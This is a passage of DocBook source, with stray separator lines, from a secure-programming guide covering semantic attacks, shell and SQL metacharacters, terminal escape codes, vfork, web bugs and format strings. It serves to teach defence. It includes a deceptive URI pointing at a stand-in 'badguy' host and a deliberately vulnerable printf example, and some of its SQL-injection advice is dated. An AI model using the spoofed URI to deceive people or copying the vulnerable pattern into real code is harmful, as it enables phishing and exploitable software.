If you expect humans to edit the output by hand later, use the
|
||
character entity references where you can, otherwise I'd use the
|
||
decimal numeric character references just because they're easier to program.
|
||
This encoding scheme can be quite inefficient for some languages
|
||
(especially Asian languages); if that is your primary content, you
|
||
might choose to use a different character encoding (charset), filter
|
||
on the critical characters (e.g., "<")
|
||
and ensure that no alternative encodings for critical characters are allowed.
|
||
</para>
|
||
|
||
<para>
|
||
URIs have their own encoding scheme, commonly called ``URL encoding.''
|
||
In this system, characters not permitted in URLs are represented using
|
||
a percent sign followed by its two-digit hexadecimal value.
|
||
To handle all of ISO 10646 (Unicode), it's recommended to first translate
|
||
the codes to UTF-8, and then encode it.
|
||
See <xref linkend="Validating-uris"> for more about validating URIs.
|
||
</para>
|
||
|
||
|
||
</sect3>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="semantic-attacks">
|
||
<title>Foil Semantic Attacks</title>
|
||
|
||
<para>
|
||
A ``semantic attack'' is an attack in which the attacker uses the
|
||
computing infrastructure/system in a way that fools the victim into
|
||
thinking they are doing something, but are doing something different,
|
||
yet the computing infrastructure/system is working exactly as it was
|
||
designed to do.
|
||
Semantic attacks often involve financial scams, where the attacker is
|
||
trying to fool the victim into giving the attacker large sums of money
|
||
(e.g., thinking they're investing in something).
|
||
For example, the attacker may try to convince the user that they're
|
||
looking at a trusted website, even if they aren't.
|
||
</para>
|
||
|
||
<para>
|
||
Semantic attacks are difficult to counter, because they're exploiting
|
||
the correct operation of the computer.
|
||
The way to deal with semantic attacks is to help give the human
|
||
additional information, so that when ``odd'' things happen the human
|
||
will have more information or a warning will be presented
|
||
that something may not be what it appears to be.
|
||
</para>
|
||
|
||
<para>
|
||
One example is URIs that, while legitimate, may fool users into
|
||
thinking they have a different meaning.
|
||
For example, look at this URI:
|
||
<programlisting>
|
||
http://www.bloomberg.com@www.badguy.com
|
||
</programlisting>
|
||
If a user clicked on that URI, they might think that they're going
|
||
to Bloomberg (who provide financial commodities news), but instead
|
||
they're going to www.badguy.com (and providing the username
|
||
www.bloomberg.com, which www.badguy.com will conveniently ignore).
|
||
If the badguy.com website then imitated the bloomberg.com site,
|
||
a user might be convinced that they're seeing the real thing
|
||
(and make investment decisions based on attacker-controlled
|
||
information).
|
||
This depends on URIs being used in an unusual way - clickable URIs
|
||
can have usernames, but usually don't.
|
||
One solution for this case is for the web browser to detect such unusual
|
||
URIs and create a pop-up confirmation widget, saying
|
||
``You are about to log into www.badguy.com as user www.bloomberg.com;
|
||
do you wish to proceed?''
|
||
If the widget allows the user to change these entries, it provides
|
||
additional functionality to the user as well as providing protection
|
||
against that attack.
|
||
</para>
|
||
|
||
<para>
|
||
Another example is homographs, particularly international homographs.
|
||
Certain letters look similar to each other, and these can be exploited
|
||
as well.
|
||
For example, since 0 (zero) and O (the letter O) look similar to each
|
||
other, users may not realize that WWW.BLOOMBERG.COM and WWW.BL00MBERG.COM
|
||
are different web addresses.
|
||
Other similar-looking letters include 1 (one) and l (lower-case L).
|
||
If international characters are allowed, the situation is worse.
|
||
For example, many Cyrillic letters look essentially the same as
|
||
Roman letters, but the computer will treat them differently.
|
||
Currently most systems don't allow international characters in host names,
|
||
but for various good reasons it's widely agreed that support for them
|
||
will be necessary in the future.
|
||
One proposed solution has been to diplay letters from different code regions
|
||
using different colors - that way,
|
||
users get more information visually.
|
||
If the users look at URI, they will hopefully notice the strange coloring.
|
||
[Gabrilovich 2002]
|
||
However, this does show the essence of a semantic attack -
|
||
it's difficult to defend against, precisely because the computers are
|
||
working correctly.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="careful-typing">
|
||
<title>Be Careful with Data Types</title>
|
||
|
||
<para>
|
||
Be careful with the data types used, in particular those used in
|
||
interfaces.
|
||
For example, ``signed'' and ``unsigned'' values are treated differently
|
||
in many languages (such as C or C++).
|
||
<!-- This was the basis of a sysctl() vulnerability -->
|
||
</para>
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="call-out">
|
||
<title>Carefully Call Out to Other Resources</title>
|
||
|
||
<epigraph>
|
||
<attribution>Psalms 146:3 (NIV)</attribution>
|
||
<para>
|
||
Do not put your trust in princes, in mortal men, who cannot save.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Practically no program is truly self-contained; nearly all programs
|
||
call out to other programs for resources, such as programs provided
|
||
by the operating system, software libraries, and so on.
|
||
Sometimes this calling out to other resources isn't obvious or involves
|
||
a great deal of ``hidden'' infrastructure which must be depended on,
|
||
e.g., the mechanisms to implement dynamic libraries.
|
||
Clearly, you must be careful about what other resources your program trusts
|
||
and you must make sure that the way you send requests to them.
|
||
</para>
|
||
|
||
<sect1 id="call-only-safe">
|
||
<title>Call Only Safe Library Routines</title>
|
||
|
||
<para>
|
||
Sometimes there is a conflict between security and the development
|
||
principles of abstraction (information hiding) and reuse.
|
||
The problem is that some high-level library routines
|
||
may or may not be implemented securely,
|
||
and their specifications won't tell you.
|
||
Even if a particular implementation is secure, it may not be
|
||
possible to ensure that other versions of the routine
|
||
will be safe, or that the same interface will be safe on other platforms.
|
||
<!-- I once said:
|
||
For example, I've not been able to assure myself that tmpfile(3) is
|
||
secure on all platforms (see (xref linkend="temporary-files"));
|
||
its specifications aren't sufficiently clear to give me confidence of this.
|
||
|
||
However, I've since learned that my fears were justified.
|
||
System V (at least up through 1993) _did_not_ do this safely. -->
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In the end, if your application must be secure, you must sometimes
|
||
re-implement your own versions of library routines.
|
||
Basically, you have to re-implement routines if you can't be sure
|
||
that the library routines will perform the necessary actions you require
|
||
for security.
|
||
Yes, in some cases the library's implementation should be fixed, but
|
||
it's your users who will be hurt if you choose a library routine that
|
||
is a security weakness.
|
||
If can, try to use the high-level interfaces when you must
|
||
re-implement something - that way, you can switch to the high-level
|
||
interface on systems where its use is secure.
|
||
</para>
|
||
|
||
<para>
|
||
If you can, test to see if the routine is secure or not, and use it if
|
||
it's secure - ideally you can perform this test as part of
|
||
compilation or installation (e.g., as part of an ``autoconf'' script).
|
||
For some conditions this kind of run-time testing is impractical, but
|
||
for other conditions, this can eliminate many problems.
|
||
If you don't want to bother to re-implement the library, at least test
|
||
to make sure it's safe and halt installation if it isn't.
|
||
That way, users will not accidentally install an insecure program and
|
||
will know what the problem is.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="limit-call-outs">
|
||
<title>Limit Call-outs to Valid Values</title>
|
||
|
||
<para>
|
||
Ensure that any call out to another program only permits valid
|
||
and expected values for every parameter.
|
||
This is more difficult than it sounds, because many
|
||
library calls or commands call lower-level routines in potentially
|
||
surprising ways.
|
||
For example, many system calls are implemented indirectly by
|
||
calling the shell, which means that passing characters which are shell
|
||
metacharacters can have dangerous effects.
|
||
So, let's discuss metacharacters.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="handle-metacharacters">
|
||
<title>Handle Metacharacters</title>
|
||
|
||
<para>
|
||
Many systems, such as the command line shell and SQL interpreters,
|
||
have ``metacharacters'', that is, characters in their input
|
||
that are not interpreted as data.
|
||
Such characters might commands, or delimit data from commands or other data.
|
||
If there's a language specification for that system's interface
|
||
that you're using, then it certainly has metacharacters.
|
||
If your program invokes those other systems and allows attackers to
|
||
insert such metacharacters, the usual result is that an attacker can
|
||
completely control your program.
|
||
</para>
|
||
|
||
<para>
|
||
One of the most pervasive metacharacter problems are those involving
|
||
shell metacharacters.
|
||
The standard Unix-like command shell (stored in /bin/sh)
|
||
interprets a number of characters specially.
|
||
If these characters are sent to the shell, then their special interpretation
|
||
will be used unless escaped; this fact can be used to break programs.
|
||
According to the WWW Security FAQ [Stein 1999, Q37], these metacharacters are:
|
||
|
||
<screen width="61">
|
||
& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r
|
||
</screen>
|
||
</para>
|
||
|
||
<para>
|
||
I should note that in many situations you'll also want to escape
|
||
the tab and space characters, since they (and the newline) are the default
|
||
parameter separators.
|
||
The separator values can be changed by setting the IFS environment
|
||
variable, but if you can't trust the source of this variable you should
|
||
have thrown it out or reset it anyway as part of your environment
|
||
variable processing.
|
||
</para>
|
||
|
||
<para>
|
||
Unfortunately, in real life this isn't a complete list.
|
||
Here are some other characters that can be problematic:
|
||
<!-- Martin Douda provided this list of ! through *; I added the note
|
||
about control characters -->
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
'!' means ``not'' in an expression (as it does in C);
|
||
if the return value of a program is tested, prepending !
|
||
could fool a script into thinking something had failed when it
|
||
succeeded or vice versa.
|
||
In some shells, the "!" also accesses the command history, which can
|
||
cause real problems.
|
||
In bash, this only occurs for interactive mode, but tcsh
|
||
(a csh clone found in some Linux distributions) uses "!" even in scripts.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
'#' is the comment character; all further text on the line is ignored.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
'-' can be misinterpreted as leading an option (or, as - -, disabling
|
||
all further options). Even if it's in the ``middle'' of a filename,
|
||
if it's preceded by what the shell considers as whitespace you may
|
||
have a problem.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
' ' (space), '\t' (tab), '\n' (newline), '\r' (return),
|
||
'\v' (vertical space), '\f' (form feed),
|
||
and other whitespace characters can have many dangerous effects.
|
||
They can may turn a ``single'' filename into multiple arguments, for example,
|
||
or turn a single parameter into multiple parameter when stored.
|
||
Newline and return have a number of additional dangers, for example,
|
||
they can be used to create ``spoofed'' log entries in some programs,
|
||
or inserted just before a separate command that is then executed
|
||
(if an underlying protocol uses newlines or returns as command
|
||
separators).
|
||
<!--
|
||
More details at this Bugtraq posting:
|
||
Subject: CRLF Injection
|
||
From: Ulf Harnhammar <ulfh@update.uu.se>
|
||
Date: Tue, 7 May 2002 00:12:10 +0200 (CEST)
|
||
To: bugtraq@securityfocus.com
|
||
-->
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Other control characters (in particular, NIL) may cause problems for
|
||
some shell implementations.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Depending on your usage, it's even conceivable that ``.''
|
||
(the ``run in current shell'') and ``='' (for setting variables) might
|
||
be worrisome characters.
|
||
However, any example I've found so far where these
|
||
are issues have other (much worse) security problems.
|
||
</para></listitem>
|
||
|
||
<!--
|
||
'.' run in current shell - also could be harmful alloving to modify
|
||
execution environment
|
||
|
||
'=' for variables, again modifying execution environment
|
||
|
||
(*) depending on programs called from script any other character can cause
|
||
problems.
|
||
-->
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
|
||
<para>
|
||
What makes the shell metacharacters particularly pervasive is
|
||
that several important library calls, such as popen(3) and system(3),
|
||
are implemented by calling the command shell, meaning that they will
|
||
be affected by shell metacharacters too.
|
||
Similarly, execlp(3) and execvp(3) may cause the shell to be called.
|
||
Many guidelines suggest avoiding popen(3), system(3), execlp(3), and execvp(3)
|
||
entirely and use execve(3) directly in C when trying to spawn
|
||
a process [Galvin 1998b].
|
||
At the least, avoid using system(3) when you can use the execve(3);
|
||
since system(3) uses the shell to expand characters, there is more
|
||
opportunity for mischief in system(3).
|
||
In a similar manner the Perl and shell backtick (`) also call a command shell;
|
||
for more information on Perl see <xref linkend="perl">.
|
||
</para>
|
||
|
||
<para>
|
||
Since SQL also has metacharacters, a similar issue revolves around
|
||
calls to SQL.
|
||
When metacharacters are provided as input to trigger SQL metacharacters,
|
||
it's often called "SQL injection".
|
||
See
|
||
<ulink url="http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf">
|
||
SPI Dynamic's paper ``SQL Injection: Are your Web Applications Vulnerable?''
|
||
</ulink>
|
||
for further discussion on this.
|
||
As discussed in <xref linkend="input">,
|
||
define a very limited pattern and only allow data matching that
|
||
pattern to enter; if you limit your pattern to ^[0-9]$ or
|
||
^[0-9A-Za-z]*$ then you won't have a problem.
|
||
If you must handle data that may include SQL metacharacters, a good approach
|
||
is to convert it (as early as possible) to some other encoding before
|
||
storage, e.g.,
|
||
HTML encoding (in which case you'll need to encode any ampersand characters
|
||
too).
|
||
Also, prepend and append a quote to all user input, even
|
||
if the data is numeric; that way, insertions of white space and other
|
||
kinds of data won't be as dangerous.
|
||
</para>
|
||
|
||
<para>
|
||
Forgetting one of these characters can be disastrous, for example,
|
||
many programs omit backslash as a shell metacharacter [rfp 1999].
|
||
As discussed in the <xref linkend="input">, a recommended approach
|
||
by some
|
||
is to immediately escape at least all of these characters when they are input.
|
||
But again, by far and away the best approach is to identify which
|
||
characters you wish to permit, and use a filter to only permit
|
||
those characters.
|
||
</para>
|
||
|
||
<para>
|
||
A number of programs, especially those designed for human interaction,
|
||
have ``escape'' codes that perform ``extra'' activities.
|
||
One of the more common (and dangerous) escape codes is one that brings
|
||
up a command line.
|
||
Make sure that these ``escape'' commands can't be included
|
||
(unless you're sure that the specific command is safe).
|
||
For example, many line-oriented mail programs (such as mail or mailx) use
|
||
tilde (~) as an escape character, which can then be used to send a number
|
||
of commands.
|
||
As a result, apparently-innocent commands such as
|
||
``mail admin < file-from-user'' can be used to execute arbitrary programs.
|
||
Interactive programs such as vi, emacs, and ed have ``escape'' mechanisms
|
||
that allow users to run arbitrary shell commands from their session.
|
||
Always examine the documentation of programs you call to search for
|
||
escape mechanisms.
|
||
It's best if you call only programs intended for use by other programs; see
|
||
<xref linkend="call-intentional-apis">.
|
||
</para>
|
||
|
||
<para>
|
||
The issue of avoiding
|
||
escape codes even goes down to low-level hardware components
|
||
and emulators of them.
|
||
Most modems implement the so-called ``Hayes'' command set.
|
||
Unless the command set is disabled, inducing
|
||
a delay, the phrase ``+++'', and then another delay forces the modem
|
||
to interpret any following text as commands to the modem instead.
|
||
This can be used to implement denial-of-service attacks (by
|
||
sending ``ATH0'', a hang-up command) or even forcing
|
||
a user to connect to someone else (a sophisticated attacker could
|
||
re-route a user's connection through a machine under the attacker's control).
|
||
For the specific case of modems, this is easy to counter
|
||
(e.g., add "ATS2-255" in the modem initialization string), but the
|
||
general issue still holds: if you're controlling a lower-level component,
|
||
or an emulation of one, make sure that you disable or otherwise handle
|
||
any escape codes built into them.
|
||
</para>
|
||
|
||
<para>
|
||
Many ``terminal'' interfaces implement the escape
|
||
codes of ancient, long-gone physical terminals like the VT100.
|
||
These codes can be useful, for example, for bolding characters,
|
||
changing font color, or moving to a particular location
|
||
in a terminal interface.
|
||
However, do not allow arbitrary untrusted data to be sent directly
|
||
to a terminal screen, because some of those codes can cause serious problems.
|
||
On some systems you can remap keys (e.g., so when a user presses
|
||
"Enter" or a function key it sends the command you want them to run).
|
||
On some you can even send codes to
|
||
clear the screen, display a set of commands you'd like the victim to run,
|
||
and then send that set ``back'', forcing the victim to run
|
||
the commands of the attacker's choosing without even waiting for a keystroke.
|
||
This is typically implemented using ``page-mode buffering''.
|
||
This security problem is why emulated tty's (represented as device files,
|
||
usually in /dev/) should only be writeable by
|
||
their owners and never anyone else - they should never have
|
||
``other write'' permission set, and unless only the user is a member of
|
||
the group (i.e., the ``user-private group'' scheme), the ``group write''
|
||
permission should not be set either for the terminal [Filipski 1986].
|
||
If you're displaying data to the user at a (simulated) terminal, you probably
|
||
need to filter out all control characters (characters with values less
|
||
than 32) from data sent back to
|
||
the user unless they're identified by you as safe.
|
||
Worse comes to worse, you can identify tab and newline (and maybe
|
||
carriage return) as safe, removing all the rest.
|
||
Characters with their high bits set (i.e., values greater than 127)
|
||
are in some ways trickier to handle; some old systems implement them as
|
||
if they weren't set, but simply filtering them inhibits much international
|
||
use.
|
||
In this case, you need to look at the specifics of your situation.
|
||
</para>
|
||
|
||
<para>
|
||
A related problem is that the NIL character (character 0) can have
|
||
surprising effects.
|
||
Most C and C++ functions assume
|
||
that this character marks the end of a string, but string-handling routines
|
||
in other languages (such as Perl and Ada95) can handle strings containing NIL.
|
||
Since many libraries and kernel calls use the C convention, the result
|
||
is that what is checked is not what is actually used [rfp 1999].
|
||
</para>
|
||
|
||
<para>
|
||
When calling another program or referring to a file
|
||
always specify its full path (e.g, <filename>/usr/bin/sort</filename>).
|
||
<!-- I believe a Corel vulnerability is based on "sort" not being listed
|
||
as /usr/bin/sort -->
|
||
For program calls,
|
||
this will eliminate possible errors in calling the ``wrong'' command,
|
||
even if the PATH value is incorrectly set.
|
||
For other file referents, this reduces problems from ``bad'' starting
|
||
directories.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="call-intentional-apis">
|
||
<title>Call Only Interfaces Intended for Programmers</title>
|
||
|
||
<para>
|
||
Call only application programming interfaces (APIs) that are
|
||
intended for use by programs.
|
||
Usually a program can invoke any other program,
|
||
including those that are really designed for human interaction.
|
||
However, it's usually unwise to invoke a program intended for human
|
||
interaction in the same way a human would.
|
||
The problem is that programs's human interfaces are intentionally rich
|
||
in functionality and are often difficult to completely control.
|
||
As discussed in <xref linkend="handle-metacharacters">,
|
||
interactive programs often have ``escape'' codes,
|
||
which might enable an attacker to perform undesirable functions.
|
||
Also, interactive programs often try to intuit the ``most likely'' defaults;
|
||
this may not be the default you were expecting, and an attacker may find
|
||
a way to exploit this.
|
||
</para>
|
||
|
||
<para>
|
||
Examples of programs you shouldn't normally call directly include
|
||
mail, mailx, ed, vi, and emacs.
|
||
At the very least, don't call these without checking
|
||
their input first.
|
||
</para>
|
||
|
||
<para>
|
||
Usually there are parameters to give you safer access to the program's
|
||
functionality,
|
||
or a different API or application that's intended for use by programs;
|
||
use those instead.
|
||
For example, instead of invoking a text editor to edit some text
|
||
(such as ed, vi, or emacs), use sed where you can.
|
||
</para>
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="check-returns">
|
||
<title>Check All System Call Returns</title>
|
||
|
||
<para>
|
||
Every system call that can return an error condition must have that
|
||
error condition checked.
|
||
One reason is that nearly all system calls require limited system resources,
|
||
and users can often affect resources in a variety of ways.
|
||
Setuid/setgid programs can have limits set on them through calls such as
|
||
setrlimit(3) and nice(2).
|
||
External users of server programs and CGI scripts
|
||
may be able to cause resource exhaustion simply by making a large number
|
||
of simultaneous requests.
|
||
If the error cannot be handled gracefully, then fail safe as discussed earlier.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-vfork">
|
||
<title>Avoid Using vfork(2)</title>
|
||
|
||
<para>
|
||
The portable way to create new processes in Unix-like systems
|
||
is to use the fork(2) call.
|
||
BSD introduced a variant called vfork(2) as an optimization technique.
|
||
In vfork(2), unlike fork(2), the child borrows the parent's memory
|
||
and thread of control until a call to execve(2V) or an exit occurs;
|
||
the parent process is suspended while the child is using its resources.
|
||
The rationale is that in old BSD systems, fork(2) would actually cause
|
||
memory to be copied while vfork(2) would not.
|
||
Linux never had this problem; because Linux used copy-on-write
|
||
semantics internally, Linux only copies pages when they changed
|
||
(actually, there are still some tables that have to be copied; in most
|
||
circumstances their overhead is not significant).
|
||
Nevertheless, since some programs depend on vfork(2),
|
||
recently Linux implemented the BSD vfork(2) semantics
|
||
(previously vfork(2) had been an alias for fork(2)).
|
||
</para>
|
||
|
||
<para>
|
||
There are a number of problems with vfork(2).
|
||
From a portability point-of-view,
|
||
the problem with vfork(2) is that it's actually fairly tricky for a
|
||
process to not interfere with its parent, especially in high-level languages.
|
||
The ``not interfering'' requirement applies to the actual machine code
|
||
generated, and many compilers generate hidden temporaries and other
|
||
code structures that cause unintended interference.
|
||
The result: programs using vfork(2) can easily fail when the code changes
|
||
or even when compiler versions change.
|
||
</para>
|
||
|
||
<para>
|
||
For secure programs it gets worse on Linux systems, because
|
||
Linux (at least 2.2 versions through 2.2.17) is vulnerable to a
|
||
race condition in vfork()'s implementation.
|
||
If a privileged process uses a vfork(2)/execve(2) pair in Linux
|
||
to execute user commands, there's a race condition
|
||
while the child process is already running as the user's
|
||
UID, but hasn`t entered execve(2) yet.
|
||
The user may be able to send signals, including SIGSTOP, to this process.
|
||
Due to the semantics of
|
||
vfork(2), the privileged parent process would then be blocked as well.
|
||
As a result, an unprivileged process could cause the privileged process
|
||
to halt, resulting in a denial-of-service of the privileged process' service.
|
||
FreeBSD and OpenBSD, at least, have code to specifically deal with this
|
||
case, so to my knowledge they are not vulnerable to this problem.
|
||
My thanks to Solar Designer, who noted and documented this
|
||
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.
|
||
<!--
|
||
http://www.geocrawler.com/search/?config=302&words=Designer+vfork
|
||
http://www.geocrawler.com/archives/3/302/2000/10/0/4460856/
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
The bottom line with vfork(2) is simple:
|
||
<emphasis remap="it">don't</emphasis> use vfork(2) in your programs.
|
||
This shouldn't be difficult; the primary use of vfork(2) is to support old
|
||
programs that needed vfork's semantics.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="embedded-content-bugs">
|
||
<title>Counter Web Bugs When Retrieving Embedded Content</title>
|
||
<para>
|
||
Some data formats can embed references to content that is automatically
|
||
retrieved when the data is viewed (not waiting for a user to select it).
|
||
If it's possible to cause this data to be retrieved through the
|
||
Internet (e.g., through the World Wide Web), then there is a
|
||
potential to use this capability to obtain information about readers
|
||
without the readers' knowledge, and in some cases to force the reader
|
||
to perform activities without the reader's consent.
|
||
This privacy concern is sometimes called a ``web bug.''
|
||
</para>
|
||
|
||
<para>
|
||
In a web bug, a reference is intentionally inserted into a document
|
||
and used by the content author to track
|
||
who, where, and how often a document is read.
|
||
The author can also essentially watch how a ``bugged'' document
|
||
is passed from one person to another or from one organization to another.
|
||
</para>
|
||
|
||
<para>
|
||
The HTML format has had this issue for some time.
|
||
According to the
|
||
<ulink url="http://www.privacyfoundation.org">Privacy Foundation</ulink>:
|
||
<blockquote>
|
||
<para>
|
||
Web bugs are used extensively today by Internet
|
||
advertising companies on Web pages and
|
||
in HTML-based email messages for tracking.
|
||
They are typically 1-by-1 pixel in size to make them
|
||
invisible on the screen to disguise the fact that they are used for tracking.
|
||
However, they could be any image (using the img tag);
|
||
other HTML tags that can implement web bugs, e.g., frames,
|
||
form invocations, and scripts.
|
||
By itself, invoking the web bug will provide the ``bugging'' site the
|
||
reader IP address, the page that the reader visited, and various information
|
||
about the browser; by also using cookies it's often possible to determine
|
||
the specific identify of the reader.
|
||
A survey about web bugs is available at
|
||
<ulink url="http://www.securityspace.com/s_survey/data/man.200102/webbug.html">http://www.securityspace.com/s_survey/data/man.200102/webbug.html</ulink>.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
What is more concerning is that other document formats seem to have
|
||
such a capability, too.
|
||
When viewing HTML from a web site with a web browser, there are other
|
||
ways of getting information on who is browsing the data, but when
|
||
viewing a document in another format from an email few users expect
|
||
that the mere act of reading the document can be monitored.
|
||
However, for many formats, reading a document can be monitored.
|
||
For example, it has been recently determined that Microsoft Word can
|
||
support web bugs;
|
||
see
|
||
<ulink url="http://www.privacyfoundation.org/advisories/advWordBugs.html">
|
||
the Privacy Foundation advisory for more information </ulink>.
|
||
As noted in their advisory,
|
||
recent versions of Microsoft Excel and Microsoft Power Point can also
|
||
be bugged.
|
||
In some cases, cookies can be used to obtain even more information.
|
||
</para>
|
||
|
||
<para>
|
||
Web bugs are primarily an issue with the design of the file format.
|
||
If your users value their privacy, you probably will want to limit the
|
||
automatic downloading of included files.
|
||
One exception might be when the file itself is being downloaded
|
||
(say, via a web browser); downloading other files from the same location
|
||
at the same time is much less likely to concern users.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="hide-sensitive-information">
|
||
<title>Hide Sensitive Information</title>
|
||
<para>
|
||
Sensitive information should be hidden from prying eyes, both while
|
||
being input and output, and when stored in the system.
|
||
Sensitive information certainly includes credit card numbers,
|
||
account balances, and home addresses, and in many applications
|
||
also includes names, email addressees, and other private information.
|
||
</para>
|
||
|
||
<para>
|
||
Web-based applications should encrypt all communication with a user
|
||
that includes sensitive information; the usual way is to use the
|
||
"https:" protocol (HTTP on top of SSL or TLS).
|
||
According to the HTTP 1.1 specification (IETF RFC 2616 section 15.1.3),
|
||
authors of services which use the HTTP protocol <emphasis>should not</emphasis>
|
||
use GET based forms for the submission of sensitive data,
|
||
because this will cause this data to be encoded in the Request-URI.
|
||
Many existing servers, proxies, and user agents will log
|
||
the request URI in some place where it might be visible to third parties.
|
||
Instead, use POST-based submissions, which are intended for
|
||
this purpose.
|
||
</para>
|
||
|
||
<para>
|
||
Databases of such sensitive data should also be encrypted on any storage
|
||
device (such as files on a disk).
|
||
Such encryption doesn't protect against an attacker breaking the secure
|
||
application, of course, since obviously the application
|
||
has to have a way to access the encrypted data too.
|
||
However, it <emphasis>does</emphasis> provide some defense against
|
||
attackers who manage to get backup disks of the data
|
||
but not of the keys used to decrypt them.
|
||
It also provides some defense if an attacker doesn't manage to break
|
||
into an application, but does manage to partially break into a related
|
||
system just enough to view the stored data - again, they now have to
|
||
break the encryption algorithm to get the data.
|
||
There are many circumstances where data can be transferred unintentionally
|
||
(e.g., core files), which this also prevents.
|
||
It's worth noting, however, that this is not as strong a defense as you'd
|
||
think, because often the server itself can be subverted or broken.
|
||
</para>
|
||
</sect1>
|
||
</chapter>
|
||
|
||
<chapter id="output">
|
||
<title>Send Information Back Judiciously</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 26:4 (NIV)</attribution>
|
||
<para>
|
||
Do not answer a fool according to his folly,
|
||
or you will be like him yourself.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="minimize-feedback">
|
||
<title>Minimize Feedback</title>
|
||
|
||
<para>
|
||
Avoid giving much information to untrusted users; simply succeed or fail,
|
||
and if it fails just say it failed and minimize information on why it failed.
|
||
Save the detailed information for audit trail logs.
|
||
For example:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
If your program requires some sort of user authentication
|
||
(e.g., you're writing a network service or login program),
|
||
give the user as little information as possible before they authenticate.
|
||
In particular, avoid giving away the version number of your program
|
||
before authentication.
|
||
Otherwise,
|
||
if a particular version of your program is found to have a vulnerability,
|
||
then users who don't upgrade from that version advertise to attackers that
|
||
they are vulnerable.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
If your program accepts a password, don't echo it back;
|
||
this creates another way passwords can be seen.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="no-comments">
|
||
<title>Don't Include Comments</title>
|
||
|
||
<para>
|
||
When returning information, don't include any ``comments'' unless you're
|
||
sure you want the receiving user to be able to view them.
|
||
This is a particular problem for web applications that generate files
|
||
(such as HTML).
|
||
Often web application programmers wish to comment their work
|
||
(which is fine), but instead of simply leaving the comment in their code,
|
||
the comment is included as part of the generated file (usually HTML or XML)
|
||
that is returned to the user.
|
||
The trouble is that these comments sometimes provide insight into how
|
||
the system works in a way that aids attackers.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="handle-full-output">
|
||
<title>Handle Full/Unresponsive Output</title>
|
||
|
||
<para>
|
||
It may be possible for a user to clog or make unresponsive a secure
|
||
program's output channel back to that user.
|
||
For example, a web browser could be intentionally halted or have its
|
||
TCP/IP channel response slowed.
|
||
The secure program should handle such cases, in particular it should release
|
||
locks quickly (preferably before replying) so that this will not create
|
||
an opportunity for a Denial-of-Service attack.
|
||
Always place time-outs on outgoing network-oriented write requests.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="control-formatting">
|
||
<title>Control Data Formatting (Format Strings/Formatation)</title>
|
||
|
||
<para>
|
||
A number of output routines in computer languages have a
|
||
parameter that controls the generated format.
|
||
In C, the most obvious example is the printf() family of routines
|
||
(including printf(), sprintf(), snprintf(), fprintf(), and so on).
|
||
Other examples in C include syslog() (which writes system log information)
|
||
and setproctitle() (which sets the string used to display
|
||
process identifier information).
|
||
Many functions with names beginning with ``err'' or ``warn'', containing
|
||
``log'' , or ending in ``printf'' are worth considering.
|
||
<!-- log() style functions calling v* in particular -->
|
||
<!-- Some info from 7/21/2000, Theo de Raadt on Bugtraq -->
|
||
<!-- OpenBSD docs for setproctitle() is at
|
||
http://www.rocketaware.com/man/man3/setproctitle.3.htm -->
|
||
Python includes the "%" operation, which on strings controls formatting
|
||
in a similar manner.
|
||
Many programs and libraries define formatting functions, often by
|
||
calling built-in routines and doing additional processing
|
||
(e.g., glib's g_snprintf() routine).
|
||
</para>
|
||
|
||
<para>
|
||
Format languages are essentially little programming languages - so
|
||
developers who let attackers control the format string are essentially
|
||
running programs written by attackers!
|
||
Surprisingly, many people seem to forget the power of these formatting
|
||
capabilities, and use data from untrusted users as the formatting parameter.
|
||
The guideline here is clear -
|
||
never use unfiltered data from an untrusted user as the format parameter.
|
||
Failing to follow this guideline usually results in a
|
||
format string vulnerability (also called a formatation vulnerability).
|
||
Perhaps this is best shown by example:
|
||
<programlisting width="61">
|
||
/* Wrong way: */
|
||
printf(string_from_untrusted_user);
|
||
/* Right ways: */
|
||
printf("%s", string_from_untrusted_user); /* safe */
|
||
fputs(string_from_untrusted_user); /* better for simple strings */
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
If an attacker controls the formatting information,
|
||
an attacker can cause all sorts of mischief by carefully
|
||
selecting the format.
|
||
The case of C's printf() is a good example -
|
||
there are lots of ways to possibly exploit user-controlled format strings
|
||
in printf().
|
||
These include
|
||
buffer overruns by creating a long formatting string (this can
|
||
result in the attacker having complete control over the program),
|
||
conversion specifications that use unpassed parameters
|
||
(causing unexpected data to be inserted), and
|
||
creating formats which produce totally unanticipated result values
|
||
(say by prepending or appending awkward data,
|
||
causing problems in later use).
|
||
A particularly nasty case is printf's
|
||
%n conversion specification, which writes the
|
||
number of characters written so far into the pointer argument;
|
||
